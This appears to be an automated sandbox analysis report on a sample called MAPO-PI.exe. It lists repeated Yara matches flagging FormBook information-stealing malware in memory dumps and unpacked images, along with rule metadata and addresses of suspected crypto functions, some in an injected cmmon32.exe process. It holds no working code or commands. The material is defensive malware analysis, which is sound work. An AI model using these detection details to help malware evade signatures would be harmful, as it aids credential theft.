Source: MAPO-PI.exe, 00000000.00000002.237713929.00000000006E0000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: MAPO-PI.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 0_2_00075376 0_2_00075376
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 0_2_0094E6A0 0_2_0094E6A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 0_2_0094E690 0_2_0094E690
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 0_2_0094CC5C 0_2_0094CC5C
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 0_2_00072050 0_2_00072050
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041E269 3_2_0041E269
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041DA87 3_2_0041DA87
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041D475 3_2_0041D475
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00409E2B 3_2_00409E2B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00409E30 3_2_00409E30
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041DFFF 3_2_0041DFFF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041CF96 3_2_0041CF96
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00EB5376 3_2_00EB5376
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189F900 3_2_0189F900
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B4120 3_2_018B4120
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AB090 3_2_018AB090
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C20A0 3_2_018C20A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019620A8 3_2_019620A8
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019628EC 3_2_019628EC
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951002 3_2_01951002
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196E824 3_2_0196E824
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA830 3_2_018BA830
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CEBB0 3_2_018CEBB0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195DBD2 3_2_0195DBD2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019503DA 3_2_019503DA
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CABD8 3_2_018CABD8
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019423E3 3_2_019423E3
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01962B28 3_2_01962B28
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BAB40 3_2_018BAB40
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019622AE 3_2_019622AE
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0194FA2B 3_2_0194FA2B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2581 3_2_018C2581
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019625DD 3_2_019625DD
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AD5E0 3_2_018AD5E0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01962D07 3_2_01962D07
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01890D20 3_2_01890D20
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01961D55 3_2_01961D55
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A841F 3_2_018A841F
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195D466 3_2_0195D466
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196DFCE 3_2_0196DFCE
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01961FF1 3_2_01961FF1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01962EF7 3_2_01962EF7
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195D616 3_2_0195D616
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B6E30 3_2_018B6E30
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00EB2050 3_2_00EB2050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2D466 16_2_04D2D466
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7841F 16_2_04C7841F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D325DD 16_2_04D325DD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7D5E0 16_2_04C7D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C92581 16_2_04C92581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D31D55 16_2_04D31D55
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D32D07 16_2_04D32D07
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C60D20 16_2_04C60D20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D32EF7 16_2_04D32EF7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2D616 16_2_04D2D616
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C86E30 16_2_04C86E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D3DFCE 16_2_04D3DFCE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D31FF1 16_2_04D31FF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D328EC 16_2_04D328EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7B090 16_2_04C7B090
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C920A0 16_2_04C920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D320A8 16_2_04D320A8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21002 16_2_04D21002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D3E824 16_2_04D3E824
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8A830 16_2_04C8A830
